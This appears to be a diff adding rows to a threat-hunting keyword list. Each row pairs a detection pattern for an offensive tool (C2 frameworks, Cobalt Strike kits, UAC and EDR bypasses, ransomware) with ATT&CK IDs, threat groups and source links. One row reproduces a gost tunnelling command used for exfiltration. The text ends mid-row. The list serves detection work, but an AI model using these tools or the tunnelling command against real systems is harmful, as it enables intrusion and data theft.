+"*-c BOF.cpp -o BOF.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
+"*-c BOF.cpp -o BOF.x64.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z"
+"*-c credentialmanager.c -o credentialmanager.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*-c modifiableautorun.c -o modifiableautorun.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*-c tokenprivileges.c -o tokenprivileges.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*-c unquotedsvcpath.c -o unquotedsvcpath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*C&C => *","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"*c:/users/public/creds.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
+"*C:\aab.txt*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*c:\agent.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" 
+"*C:\dsc_hello.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*C:\ProgramData\Prefetch\na.exe*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*C:\ProgramData\SystemData\microsoft_Windows.dll*","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*C:\Temp\file.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
+"*C:\Temp\poc.txt*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z"
+"*c:\temp\something.ps1*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*C:\Uac\results.cab*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z"
+"*C:\Users\*\AppData\Roaming\Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*C:\Users\*\AppData\Roaming\svchost.exe*","offensive_tool_keyword","chaos","Chaos ransomware behavior","T1486","TA0040","chaos ransomware","N/A","Ransomware","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*C:\Users\Public\*.dmp*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*c:\users\public\creds.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
+"*c:\users\public\output.txt*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
+"*C:\Users\Public\perm.txt*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*C:\Users\Public\test.txt*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*C:\Windows\DirectX.log*\Windows\Temp\backup.log*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z"
+"*C:\Windows\MEMORY.DMP*","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F socks5://*:*@*:443*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. 
they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z"
+"*C:\Windows\Temp\move.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*C:\Windows\Temp\moveme.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*c:\windows\temp\test.tmp farmer*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
+"*C??/generator.cpp*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z"
+"*c0ddb8ed4e267153cd7fd2fb858e0a18fd8fa88ddc3f748bcee35372f41bec46*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
+"*c1090dbc-f2f7-4d90-a241-86e0c0217786*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*c1405b280bacc7566ccd041a74461de3f8496128fd71e39368905cf8d95268f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*C2 Client*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*C2 Framework for villains*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*C2 Nimplant Server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*C2 Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 
4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*C2.KillDate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*c2.striker.*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z"
+"*C2.UserAgent*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*C2/C2Server.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*C2_RPC_functions.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*c2_server*.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*c2_server.resources*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*C2_Server-main*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 
","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*c2_service.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*C2concealer -*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*C2concealer-master*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*'C2Default'*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*c2endpoint.php*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*c2hlbGxjb2Rl*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*c2lint *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of 
flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*C2ListenerPort*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
